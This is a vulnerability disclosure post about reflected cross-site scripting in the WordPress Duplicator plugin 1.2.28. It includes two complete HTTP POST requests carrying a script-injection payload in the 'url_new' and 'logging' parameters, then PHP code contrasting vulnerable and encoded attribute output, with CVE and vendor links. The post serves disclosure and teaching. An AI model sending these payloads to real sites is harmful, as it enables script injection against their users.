I keep finding cross-site scripting in WordPress plugins; I’m going to have to automate it somehow :).
In this case the plugin is “Duplicator Migration” version 1.2.28 (https://es.wordpress.org/plugins/duplicator/), which is active on more than 1 million WordPress sites and is developed by Snapcreek (https://snapcreek.com).
It can be exploited via two attack vectors:
From the view.step4.php file:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo
From the view.step2.php file:
POST /wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo
I’m sorry I didn’t show any capture of the XSS execution, but I didn’t need to because the Snapcreek developers didn’t ask me to.
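Both payloads start with `">`, which means the parameter is being reflected inside a quoted HTML attribute: the `"` closes the attribute, the `>` closes the tag, and the rest becomes markup. The following is an added illustration in PHP, not Duplicator’s own code: the installer runs standalone outside WordPress, so the hardened version uses htmlspecialchars() with ENT_QUOTES instead of WordPress’s esc_attr(); the function names and the input markup are hypothetical, only the parameter name and payload come from the requests above.

```php
<?php
// Added example (not the plugin's code): reflecting a POST parameter into an
// HTML attribute the wrong way and the right way. Parameter name "url_new"
// and the payload are taken from the advisory; the rest is hypothetical.

// Vulnerable: the raw request value is concatenated straight into value="".
// A value beginning with "> terminates the attribute and the <input> tag,
// so everything after it is parsed as new HTML.
function render_step_field_vulnerable(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened: encode for attribute context. ENT_QUOTES turns both " and ' into
// entities, so the value can never close the attribute it is placed in;
// < and > are encoded as well, so no tag can be injected either.
function render_step_field_safe(string $name, string $value): string
{
    $safeName  = htmlspecialchars($name,  ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $safeValue = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="' . $safeName . '" value="' . $safeValue . '">';
}

// Constructed stand-in for $_POST['url_new'] from the request above.
$payload = '"><script>alert(1)</script>demo';

echo "vulnerable: ", render_step_field_vulnerable('url_new', $payload), PHP_EOL;
echo "hardened:   ", render_step_field_safe('url_new', $payload), PHP_EOL;

// Sanity check a reviewer can run: the encoded output must contain no raw
// quote or angle bracket that originated from the untrusted value.
$rendered = render_step_field_safe('url_new', $payload);
$valueStart = strpos($rendered, 'value="') + strlen('value="');
$encodedValue = substr($rendered, $valueStart, -2); // strip closing "> of the tag
assert(strpbrk($encodedValue, '"\'<>') === false);
```

The same fix applies to the `logging` parameter in view.step2.php; the defensive rule is that every untrusted value written into an attribute is encoded for attribute context at the point of output, not filtered on input.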
- Developer’s acknowledgement: https://snapcreek.com/duplicator/docs/changelog (Lite section)
- Publication on Packet Storm Security: https://packetstormsecurity.com/files/144914/WordPress-Duplicator-Migration-1.2.28-Cross-Site-Scripting.html
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16815